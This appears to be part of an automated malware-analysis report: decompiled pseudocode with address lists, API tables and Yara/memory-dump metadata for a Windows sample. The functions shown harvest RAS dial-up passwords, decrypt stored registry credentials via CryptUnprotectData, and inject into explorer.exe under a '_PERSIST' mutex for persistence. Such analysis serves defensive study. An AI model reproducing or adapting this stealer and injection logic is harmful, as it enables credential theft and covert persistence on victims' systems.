								if(_v200.dwMajorVersion >= 5) {
									_push(0);
									_push(0x1a);
									__eax =  &_v28;
									__eax = E00401F9C( &_v28);
									_push(__eax);
									_push(0);
									L00407B7C();
									__eflags = __eax;
									if(__eflags != 0) {
										__edx =  &_v3024;
										_v28 = E00407F4C(_v28,  &_v3024, __eflags);
										__edx = _v3024;
										 &_v28 = E00401B58( &_v28, _v3024);
									}
									_push(0);
									_push(0x23);
									__eax =  &_v32;
									__eax = E00401F9C( &_v32);
									_push(__eax);
									_push(0);
									L00407B7C();
									__eflags = __eax;
									if(__eflags != 0) {
										__edx =  &_v3028;
										_v32 = E00407F4C(_v32,  &_v3028, __eflags);
										__edx = _v3028;
										 &_v32 = E00401B58( &_v32, _v3028);
									}
									__eax = E00407E40(__ebx, __ecx, __edi, __esi, __eflags);
								}
							}
							_v36 = 0xffffffff;
							__eax = _v20;
							__eax = _v20 - 1;
							__eflags = __eax;
							if(__eax >= 0) {
								_v52 = __eax;
								__esi = 0;
								__eflags = 0;
								do {
									_v1252 = 0x41c;
									__esi = __esi << 5;
									__ebx = (__esi << 5) + __esi;
									__eax = _v24;
									__eax = _v24 + 4 + __ebx * 8;
									__edx =  &_v1248;
									__ecx = 0x100;
									E00401258(_v24 + 4 + __ebx * 8, 0x100,  &_v1248) =  &_v36;
									_push( &_v36);
									__eax =  &_v1252;
									_push( &_v1252);
									_push(0);
									L00407B8C();
									_v12 = 0x6e8;
									__eax =  &_v3020;
									__ecx = 0;
									__edx = _v12;
									E00401414( &_v3020, _v12) = _v12;
									_v3020 = _v12;
									 &_v12 =  &_v16;
									__eax = _v24;
									__edx = _v24 + 4 + __ebx * 8;
									__ecx =  &_v3020;
									0 = E004081BC(0, _v24 + 4 + __ebx * 8,  &_v16, 0,  &_v12);
									__eflags = _v200.dwPlatformId - 2;
									if(_v200.dwPlatformId == 2) {
										__eflags = _v200.dwMajorVersion - 5;
										if(_v200.dwMajorVersion >= 5) {
											__eax = _v28;
											__eflags =  *_v28;
											if( *_v28 != 0) {
												L17:
												__eax =  &_v40;
												__edx =  &_v1248;
												__eax = E00401CAC( &_v40,  &_v1248);
												__edx =  &_v44;
												_v40 = E00403268(_v40, __ebx, __ecx,  &_v44, __esi, __eflags);
												 &_v28 = E00401F9C( &_v28);
												__eax = _v40;
												__eax = E00401F48(_v40);
												__edi = __eax;
												__ebx = __eax;
												__eflags = __ebx;
												if(__ebx == 0) {
													__eax =  &_v32;
													__eax = E00401F9C( &_v32);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx == 0) {
													 &_v28 = E00401F9C( &_v28);
													__eax = _v44;
													__eax = E00401F48(_v44);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx == 0) {
													 &_v32 = E00401F9C( &_v32);
													__eax = _v44;
													__eax = E00401F48(_v44);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx > 0) {
													__eax = __ebx;
													__edx = 0;
													__eflags = 0;
													 &_v3284 = E00402BC0( &_v3284, __ebx, 0);
													__edx =  &_v3284;
													 &_v48 = E00401D18( &_v48,  &_v3284, __eflags);
													__edi = 0x100;
													__ebx = 0x40e9bc;
													do {
														__eax =  *__ebx;
														__edx = _v48;
														__eax = E00401E94( *__ebx, _v48);
														if(__eflags == 0) {
															__eflags =  *(__ebx + 4);
															if( *(__ebx + 4) != 0) {
																_t92 = __ebx + 4; // 0x0
																__eax =  *_t92;
																_push(E00401D50( *_t92));
																_t93 = __ebx + 4; // 0x0
																__eax =  *_t93;
																__edx = E00401F48( *_t93);
																__eax =  &_v476;
																_pop(__ecx);
																__eax = E00408038( &_v476, __ecx, __edx);
															}
														}
														__ebx = __ebx + 8;
														__edi = __edi - 1;
														__eflags = __edi;
													} while (__edi != 0);
												}
											} else {
												__eax = _v32;
												__eflags =  *_v32;
												if( *_v32 != 0) {
													goto L17;
												}
											}
										}
									}
									__eax =  &_v733;
									__eflags =  &_v733;
									if( &_v733 != 0) {
										__eax =  &_v476;
										__eflags =  &_v476;
										if( &_v476 != 0) {
											__eax = _v8;
											_push( *_v8);
											_push("RAS Passwords |");
											__eax =  &_v3288;
											__edx =  &_v733;
											__eax = E00401CAC( &_v3288,  &_v733);
											_push(_v3288);
											_push(0x40865c);
											__eax =  &_v3292;
											__edx =  &_v476;
											__eax = E00401CAC( &_v3292,  &_v476);
											_push(_v3292);
											_push(0x40865c);
											_push(0x408668);
											__eax = _v8;
											__edx = 7;
											E00401E10();
										}
									}
									__esi = __esi + 1;
									_t105 =  &_v52;
									 *_t105 = _v52 - 1;
									__eflags =  *_t105;
								} while ( *_t105 != 0);
							}
						}
					}
					__eax = 0;
					__eflags = 0;
					_pop(__edx);
					_pop(__ecx);
					_pop(__ecx);
					 *[fs:eax] = __edx;
					_push(E00408622);
					__eax =  &_v3292;
					__edx = 2;
					__eax = E00401AE4( &_v3292, 2);
					__eax =  &_v3028;
					__edx = 2;
					__eax = E00401AE4( &_v3028, 2);
					__eax =  &_v48;
					__edx = 3;
					__eax = E00401AE4( &_v48, 3);
					__eax =  &_v32;
					__edx = 2;
					__eax = E00401AE4( &_v32, 2);
					__eax =  &_v24;
					__edx =  *0x408214; // 0x408218
					return E00402FC8( &_v24, __edx);
				}
			}


































                                    0x00408230
                                    0x00408231
                                    0x00408232
                                    0x00408234
                                    0x004081c8
                                    0x004081cf
                                    0x004081ef
                                    0x00408238
                                    0x00408238
                                    0x00408239
                                    0x0040823b
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408244
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408273
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408291
                                    0x00408295
                                    0x0040829b
                                    0x0040829e
                                    0x0040829f
                                    0x004082a2
                                    0x004082a7
                                    0x004082ad
                                    0x004082b2
                                    0x004082b5
                                    0x004082b8
                                    0x004082bd
                                    0x004082bf
                                    0x004082bf
                                    0x004082c2
                                    0x004082c5
                                    0x004082c8
                                    0x004082c9
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082da
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x004082f8
                                    0x004082fb
                                    0x00408300
                                    0x00408305
                                    0x00408308
                                    0x0040830d
                                    0x00408312
                                    0x00408319
                                    0x0040831b
                                    0x00408322
                                    0x00408324
                                    0x00408326
                                    0x00408328
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x0040833c
                                    0x00408345
                                    0x0040834a
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835c
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408370
                                    0x00408379
                                    0x0040837e
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408322
                                    0x00408391
                                    0x00408398
                                    0x0040839b
                                    0x0040839c
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b6
                                    0x004083b9
                                    0x004083bb
                                    0x004083be
                                    0x004083c2
                                    0x004083c8
                                    0x004083d2
                                    0x004083d5
                                    0x004083d6
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083eb
                                    0x004083f1
                                    0x004083f3
                                    0x004083fb
                                    0x004083fe
                                    0x0040840a
                                    0x0040840e
                                    0x00408411
                                    0x00408415
                                    0x0040841d
                                    0x00408422
                                    0x00408429
                                    0x0040842f
                                    0x00408436
                                    0x0040843c
                                    0x0040843f
                                    0x00408442
                                    0x00408450
                                    0x00408450
                                    0x00408453
                                    0x00408459
                                    0x0040845e
                                    0x00408464
                                    0x0040846c
                                    0x00408479
                                    0x0040847c
                                    0x00408481
                                    0x00408489
                                    0x0040848b
                                    0x0040848d
                                    0x0040848f
                                    0x00408492
                                    0x004084a5
                                    0x004084a5
                                    0x004084a7
                                    0x004084a9
                                    0x004084ae
                                    0x004084bb
                                    0x004084be
                                    0x004084c9
                                    0x004084c9
                                    0x004084cb
                                    0x004084cd
                                    0x004084d2
                                    0x004084df
                                    0x004084e2
                                    0x004084ed
                                    0x004084ed
                                    0x004084ef
                                    0x004084f1
                                    0x004084f3
                                    0x004084f5
                                    0x004084f5
                                    0x004084ff
                                    0x00408504
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x0040851c
                                    0x0040851e
                                    0x00408521
                                    0x00408526
                                    0x00408528
                                    0x0040852c
                                    0x0040852e
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x00408537
                                    0x0040853f
                                    0x00408541
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040852c
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x00408436
                                    0x00408553
                                    0x00408559
                                    0x0040855b
                                    0x0040855d
                                    0x00408563
                                    0x00408565
                                    0x00408567
                                    0x0040856a
                                    0x0040856c
                                    0x00408571
                                    0x00408577
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x0040858d
                                    0x00408593
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085ae
                                    0x004085b1
                                    0x004085b6
                                    0x004085b6
                                    0x00408565
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c5
                                    0x004085c5
                                    0x004085c7
                                    0x004085c8
                                    0x004085c9
                                    0x004085ca
                                    0x004085cd
                                    0x004085d2
                                    0x004085d8
                                    0x004085dd
                                    0x004085e2
                                    0x004085e8
                                    0x004085ed
                                    0x004085f2
                                    0x004085f5
                                    0x004085fa
                                    0x004085ff
                                    0x00408602
                                    0x00408607
                                    0x0040860c
                                    0x0040860f
                                    0x0040861a
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |$RasGetEntryProperties
                                    • API String ID: 606077693-541967613
                                    • Opcode ID: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction ID: 6468358b1ab4b7f73c56054985f5742c7a8c8687d669c1df658abded6e8fa1dc
                                    • Opcode Fuzzy Hash: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction Fuzzy Hash: 88C10F70A002199FDB10EBA5CD81BDEB7B9EF44308F1045BBE544B72D1DB78AE458B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B7FC, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 85processthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E0040B7FC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v96;
				intOrPtr _t21;
				void* _t44;
				intOrPtr* _t50;
				intOrPtr _t53;
				void* _t62;

				_push(__ebx);
				_push(__esi);
				_v96 = 0;
				_push(_t62);
				_push(0x40b8fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62 + 0xffffffa4;
				_t50 =  *0x40d204; // 0x40e8f8
				E00401D9C( &_v96, "_PERSIST",  *_t50);
				_t44 = E00403568(0, 0, E00401F48(_v96));
				if(GetLastError() != 0xb7) {
					CloseHandle(_t44);
					_t21 =  *0x40d1cc; // 0x40e924
					_t59 = E00401F9C(_t21);
					GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
					if(E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t27, "_PERSIST", _t22, __edi, _t22) == 0) {
						E00403738();
						E00403738();
						CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v92,  &_v24);
						E004040F4(_v24.hProcess, _v24.hProcess, "_PERSIST", _t59, __edi, _t59);
					}
				} else {
					CloseHandle(_t44);
				}
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E0040B901);
				return E00401AC0( &_v96);
			}












                                    0x0040b802
                                    0x0040b803
                                    0x0040b806
                                    0x0040b80b
                                    0x0040b80c
                                    0x0040b811
                                    0x0040b814
                                    0x0040b817
                                    0x0040b827
                                    0x0040b83e
                                    0x0040b84a
                                    0x0040b858
                                    0x0040b85d
                                    0x0040b867
                                    0x0040b87a
                                    0x0040b89c
                                    0x0040b8a6
                                    0x0040b8b3
                                    0x0040b8d3
                                    0x0040b8df
                                    0x0040b8df
                                    0x0040b84c
                                    0x0040b84d
                                    0x0040b84d
                                    0x0040b8e6
                                    0x0040b8e9
                                    0x0040b8ec
                                    0x0040b8f9

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040B8FA), ref: 0040B840
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B84D
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B858
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040B874
                                    • GetWindowThreadProcessId.USER32(00000000,Shell_TrayWnd), ref: 0040B87A
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000,?,00000000,00000000,0040B8FA), ref: 0040B88A
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000), ref: 0040B8D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCreateHandleWindow$ErrorFindLastMutexOpenThread
                                    • String ID: $@$Shell_TrayWnd$_PERSIST$explorer.exe
                                    • API String ID: 3936873891-3256395681
                                    • Opcode ID: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction ID: a98b29369305a718b3746a0c20b80fe6e43b54703aa679a88659f244b6e949d5
                                    • Opcode Fuzzy Hash: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction Fuzzy Hash: 862131B5B402097BE710FBA5CC42F9E77ACDB44705F60843BB600BB2D2DA78AE05566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408E58, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 328registryencryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00408E58(char __eax, void* __ebx, void* __ecx, char* __edx, void* __edi, char* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				int _v16;
				char _v20;
				void* _v24;
				int _v28;
				int _v32;
				int _v36;
				char* _v40;
				char* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				long _t168;
				long _t238;
				long _t251;
				char* _t259;
				signed int _t260;
				intOrPtr _t262;
				intOrPtr _t323;
				intOrPtr _t326;
				intOrPtr _t327;
				long _t339;
				long _t340;
				intOrPtr _t343;
				intOrPtr _t344;
				void* _t350;

				_t350 = __fp0;
				_t341 = __esi;
				_t343 = _t344;
				_t262 = 0xd;
				do {
					_push(0);
					_push(0);
					_t262 = _t262 - 1;
				} while (_t262 != 0);
				_t1 =  &_v8;
				 *_t1 = _t262;
				_push(__esi);
				_v12 =  *_t1;
				_t259 = __edx;
				_v8 = __eax;
				E0040302C(_v8);
				_push(_t343);
				_push(0x4092a7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t344;
				E00401AC0( &_v80);
				_v16 = 0;
				if(RegOpenKeyExA(0x80000001, _t259, 0, 1,  &_v24) == 0) {
					_v28 = 0x400;
					_t341 = E00401174(_v28);
					while(RegEnumValueA(_v24, _v16, _t341,  &_v28, 0, 0, 0, 0) != 0x103) {
						_v28 = 0x400;
						_t339 = E00402E08();
						__eflags = _t339;
						if(_t339 >= 0) {
							_t340 = _t339 + 1;
							_t260 = 0;
							__eflags = 0;
							do {
								E00408AF8( *((intOrPtr*)(_v8 + _t260 * 4)), _t260,  &_v20, _t340, _t341);
								RegQueryValueExA(_v24, _t341, 0,  &_v32, 0,  &_v36);
								_push(_v36);
								E00402FBC();
								_t344 = _t344 + 4;
								_t238 = RegQueryValueExA(_v24, _t341, 0,  &_v32, _v40,  &_v36);
								__eflags = _t238;
								if(_t238 == 0) {
									_v44 = _v40;
									_v48 = _v36;
									_v60 =  *((intOrPtr*)(_v8 + _t260 * 4));
									E00402218( &_v84,  *((intOrPtr*)(_v8 + _t260 * 4)));
									_v64 = E00402274(_v84) + 1 + E00402274(_v84) + 1;
									_push( &_v56);
									_push(1);
									_push(0);
									_push(0);
									_push( &_v64);
									_push(0);
									_t251 =  &_v48;
									_push(_t251);
									L004086F0();
									__eflags = _t251;
									if(_t251 != 0) {
										_push(_v80);
										_push("Address: ");
										E00401CDC( &_v88,  *((intOrPtr*)(_v8 + _t260 * 4)));
										_push(_v88);
										_push(0x4092d4);
										E00401E10();
										_push(_v80);
										E00408CCC(_v52, _t260,  &_v92, _t340, _t341, _t350);
										_push(_v92);
										_push(0x4092e0);
										E00401E10();
									}
								}
								_t260 = _t260 + 1;
								_t340 = _t340 - 1;
								__eflags = _t340;
							} while (_t340 != 0);
						}
						E00403738();
						_t57 =  &_v16;
						 *_t57 = _v16 + 1;
						__eflags =  *_t57;
					}
				}
				RegCloseKey(_v24);
				L17:
				while(E0040202C(0x4092e0, _v80) > 0) {
					E00401FA4(_v80, E0040202C(0x4092e0, _v80) - 1, 1,  &_v72);
					E00401FE4( &_v80, E0040202C(0x4092e0, _v80) + 1, 1);
					E00401D9C( &_v100, 0x4092e0, _v72);
					E0040592C(_v100, _t259, _v80, 0, _t341, __eflags,  &_v96);
					E00401B58( &_v80, _v96);
					__eflags = E0040202C(0x4092ec, _v72) - 1;
					E00401FA4(_v72, E0040202C(0x4092ec, _v72) - 1, 1,  &_v104);
					E00401E94(_v104, "Address");
					if(__eflags == 0) {
						E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
						E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v68);
						E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
						while(1) {
							_t168 = E0040202C(0x4092d4, _v72);
							__eflags = _t168;
							if(_t168 <= 0) {
								goto L17;
							}
							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
							_push(_v76);
							_push(_v68);
							_push(0x4092d4);
							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v108);
							_push(_v108);
							_push(0x4092d4);
							E00401E10();
							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
							_push(_v76);
							__eflags = E0040202C(0x4092d4, _v72) - 1;
							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v112);
							_push(_v112);
							_push(0x4092d4);
							E00401E10();
							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
							E00401D58( &_v76, 0x4092e0);
						}
					}
				}
				E00401B14(_v12, _v76);
				_pop(_t323);
				 *[fs:eax] = _t323;
				_push(E004092AE);
				E00401AE4( &_v112, 7);
				E00402108( &_v84);
				E00401AE4( &_v80, 4);
				_t326 =  *0x408e34; // 0x408e38
				E00402FC8( &_v40, _t326);
				E00401AC0( &_v20);
				_t327 =  *0x408730; // 0x408734
				return E00402FC8( &_v8, _t327);
			}












































                                    0x00408e58
                                    0x00408e58
                                    0x00408e59
                                    0x00408e5c
                                    0x00408e61
                                    0x00408e61
                                    0x00408e63
                                    0x00408e65
                                    0x00408e65
                                    0x00408e68
                                    0x00408e68
                                    0x00408e6c
                                    0x00408e6e
                                    0x00408e71
                                    0x00408e73
                                    0x00408e79
                                    0x00408e80
                                    0x00408e81
                                    0x00408e86
                                    0x00408e89
                                    0x00408e8f
                                    0x00408e96
                                    0x00408eae
                                    0x00408eb4
                                    0x00408ec3
                                    0x00408ff8
                                    0x00408eca
                                    0x00408ed9
                                    0x00408edb
                                    0x00408edd
                                    0x00408ee3
                                    0x00408ee4
                                    0x00408ee4
                                    0x00408ee6
                                    0x00408eef
                                    0x00408f05
                                    0x00408f0d
                                    0x00408f1c
                                    0x00408f21
                                    0x00408f37
                                    0x00408f3c
                                    0x00408f3e
                                    0x00408f47
                                    0x00408f4d
                                    0x00408f56
                                    0x00408f62
                                    0x00408f72
                                    0x00408f78
                                    0x00408f79
                                    0x00408f7b
                                    0x00408f7d
                                    0x00408f82
                                    0x00408f83
                                    0x00408f85
                                    0x00408f88
                                    0x00408f89
                                    0x00408f8e
                                    0x00408f90
                                    0x00408f92
                                    0x00408f95
                                    0x00408fa3
                                    0x00408fa8
                                    0x00408fab
                                    0x00408fb8
                                    0x00408fbd
                                    0x00408fc9
                                    0x00408fce
                                    0x00408fd1
                                    0x00408fde
                                    0x00408fde
                                    0x00408f90
                                    0x00408fe3
                                    0x00408fe4
                                    0x00408fe4
                                    0x00408fe4
                                    0x00408ee6
                                    0x00408ff0
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff8
                                    0x00409021
                                    0x00000000
                                    0x00409233
                                    0x00409047
                                    0x00409064
                                    0x00409078
                                    0x00409085
                                    0x00409090
                                    0x004090a8
                                    0x004090b1
                                    0x004090be
                                    0x004090c3
                                    0x004090e0
                                    0x00409101
                                    0x0040911d
                                    0x0040921e
                                    0x00409226
                                    0x0040922b
                                    0x0040922d
                                    0x00000000
                                    0x00000000
                                    0x0040913e
                                    0x00409143
                                    0x00409146
                                    0x00409149
                                    0x0040916a
                                    0x0040916f
                                    0x00409172
                                    0x0040917f
                                    0x0040919b
                                    0x004091b7
                                    0x004091bc
                                    0x004091d2
                                    0x004091db
                                    0x004091e0
                                    0x004091e3
                                    0x004091f0
                                    0x0040920c
                                    0x00409219
                                    0x00409219
                                    0x0040921e
                                    0x004090c3
                                    0x0040924e
                                    0x00409255
                                    0x00409258
                                    0x0040925b
                                    0x00409268
                                    0x00409270
                                    0x0040927d
                                    0x00409285
                                    0x0040928b
                                    0x00409293
                                    0x0040929b
                                    0x004092a6

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00408EA7
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001), ref: 00408F05
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 00408F37
                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 00408F89
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001,?,00000000,00000001,?,00000000,004092A7), ref: 0040900D
                                    • RegCloseKey.ADVAPI32(?,80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00409021
                                      • Part of subcall function 00408AF8: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                      • Part of subcall function 00408AF8: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                      • Part of subcall function 00408AF8: CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                      • Part of subcall function 00408AF8: CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                      • Part of subcall function 00408AF8: CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                      • Part of subcall function 00408AF8: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Value$ContextDataQuery$AcquireCloseCreateDestroyEnumOpenParamReleaseUnprotect
                                    • String ID: Address$Address: $J
                                    • API String ID: 1010751750-89420950
                                    • Opcode ID: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction ID: a1307f370dcfab90242bbc2907a83997e987d907be1ae94acc32d6e323161374
                                    • Opcode Fuzzy Hash: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction Fuzzy Hash: CBC1D135A00109ABDB01EBD5C981ADEB7B9EF48304F20447BF500F73D6DA79AE468B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040930B, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 226encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0040930B(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v114;
				intOrPtr _v117;
				void _v151;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				void* _t81;
				void* _t86;
				intOrPtr _t121;
				void* _t160;
				void* _t175;
				void* _t187;
				void* _t189;
				short* _t191;
				intOrPtr _t198;
				intOrPtr _t203;
				void* _t226;
				void* _t233;
				signed int _t234;
				void* _t236;
				intOrPtr* _t238;
				intOrPtr _t240;
				intOrPtr _t241;

				_t174 = __ebx;
				_v117 = _v117 + __edx;
				_t240 = _t241;
				_t175 = 0x1b;
				do {
					_push(0);
					_push(0);
					_t175 = _t175 - 1;
				} while (_t175 != 0);
				_push(_t175);
				_push(__ebx);
				_t236 = __eax;
				_push(_t240);
